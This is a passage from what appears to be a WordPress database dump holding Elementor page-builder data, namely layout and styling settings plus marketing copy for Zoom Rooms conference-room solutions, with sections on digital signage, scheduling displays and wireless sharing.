system.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"406125c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4><p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0518cb7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92a3de4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c7f20ea\",\"elType\":\"widget\",\"settings\":{\"title\":\"Zoom Rooms includes the following value-added services at no additional cost.\",\"header_size\":\"h3\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0e401c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"428f120\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a4857de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Digital Signage<\\/h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.<\\/p><ul><li>Leverage room displays when not in use<\\/li><li>Manage displays at scale or individually<\\/li><li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b6e2b30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8217db2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Scheduling Display<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1221c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cf0ae88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Make interactive collaboration easy with touch screens<\\/h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation\\u00a0 all at the tip of your fingers.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d2912a1\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/gezS90Pg_fk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d565e7b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c28793b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29d7347\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc6dcbe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2576d197\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f0691d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Zoom for the\\u00a0Conference Room<\\/h3><h4>Simple, flexible set up<\\/h4><p>Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/p><h4>Modern capabilities<\\/h4><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p><h4>Happy, productive users<\\/h4><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.<\\/p><h3>Capabilities that enhance the way people work<\\/h3><h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4><p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p><h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4><p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p><h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4><p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p><h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4><p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p><h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4><p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.<\\/p><h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4><p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console.<\\/p><h3>Already have an existing video conference room system?<\\/h3><p>Use Zoom\\u2019s Conference Room Connector to extend your standards-based conference systems to the cloud. Zoom\\u2019s Conference Room Connector helps organizations leverage existing products through its life-cycle while delivering a consistent and unified communication experience.<\\/p><h3>Zoom Rooms includes the following value-added services at no additional cost.<\\/h3><h4>Digital Signage<\\/h4><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.<\\/p><ul><li>Leverage room displays when not in use<\\/li><li>Manage displays at scale or individually<\\/li><li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li><\\/ul><h4>Scheduling Display<\\/h4><p>End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.<\\/p><h4>Make interactive collaboration easy with touch screens<\\/h4><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation all at the tip of your fingers.<\\/p><h4>Flawless video conferencing for every space<\\/h4><p>Unleash the power of cloud-based video conferencing anywhere work gets done.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6178,3052,'_elementor_version','0.4'),(6193,3054,'_elementor_version','0.4'),(6885,3297,'_elementor_edit_mode','builder'),(6886,3297,'_elementor_template_type','post'),(6196,3055,'_wp_page_template','template-fullwidth.php'),(6197,3055,'_elementor_edit_mode','builder'),(6198,3055,'_elementor_template_type','post'),(6199,3055,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6200,3055,'_elementor_data','[{\"id\":\"cad15a9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5c7499\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"96a0357\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom for the Conference Room<\\/h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6457ddc\",\"elType\":\"section\",\"settings\":{\"structure\":\"33\"},\"elements\":[{\"id\":\"bdc71a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3abc915\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1901198\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/yRQGXlJS-xI\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"bcb7227\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66635b2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"1e75488\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5affd82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simple, flexible set up<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d999cea\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6757f8b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modern capabilities<\\/h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b51dbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ff854f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Happy, productive users<\\/h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"faaa0fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/Zoom-Conference-Room-Solutions_page2_image7.jpg\",\"id\":3048},\"background_position\":\"center center\",\"background_attachment\":\"scroll\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"886f41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a8a224a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4><p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"412feda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4><p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3d2b744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4><p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a34735d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"isInner\":false},{\"id\":\"ab89310\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"